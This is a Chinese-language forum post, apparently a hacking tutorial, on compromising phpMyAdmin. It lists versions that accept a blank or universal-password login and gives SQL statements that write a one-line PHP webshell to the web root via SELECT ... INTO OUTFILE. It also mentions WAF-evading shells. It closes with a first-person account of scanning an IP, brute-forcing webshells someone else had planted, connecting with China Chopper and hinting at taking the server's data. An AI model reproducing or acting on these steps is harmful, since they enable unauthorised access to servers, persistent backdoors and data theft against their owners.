相对而言,phpmyadmin中存在许多漏洞。 对于新手,请分享一些漏洞。 如果您深入了解代码审核,也可以与我讨论。
phpmyadmin2.11.3-2.11.4这两个版本均为通用密码,直接使用“ localhost'@'@”作为帐户,无需输入密码。
phpmyadmin2.11.9.2这个版本没有密码。 以root用户身份直接登录,不需要密码
找这个的话 用自己的写的脚本,或者搜素引擎什么的,这里懂的人就懂了,不懂也不在这里。
关于拿shell,----》root权限,并且有写文件权限 ----》导出的目录有写权限 ----》有的情况下,就算你这两个都有,但是服务器的一些配置还是会对这个有影响。
在getshell之前先进入一个数据库
第一种,使用sql语句,创建一个表,添加一个字段,字段的内容为一句话,然后导出到php文件中,最后删除这个表,这个是最保险的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('')
select 列 from 表 into _utfile '路径'
Drop TABLE IF EXISTS 表;
第二种方法,这个是直接写入
select '一句话'INTO _UTFILE '路径'
还有几种方法,大致原理都一样。
然后,一般的话,一句话都是
有狗的话,用免杀一句话,下面这个是我过年前构造的过狗一句话,现在应该还可以过
找路径的话,
3//再者就是利用网站包路径,这些会的都会了,不会的慢慢的就会了。
下面开始实战,脚本扫到一个IP,显示存在phpmyadmin,打开
一看这些php文件就是后门一句话,放到几万字典爆破,两秒钟
直接菜刀链接。。。。。
这个肯定被人搞了,直接打包好东西,你懂的。。。提权什么的就不必要了。
我来说两句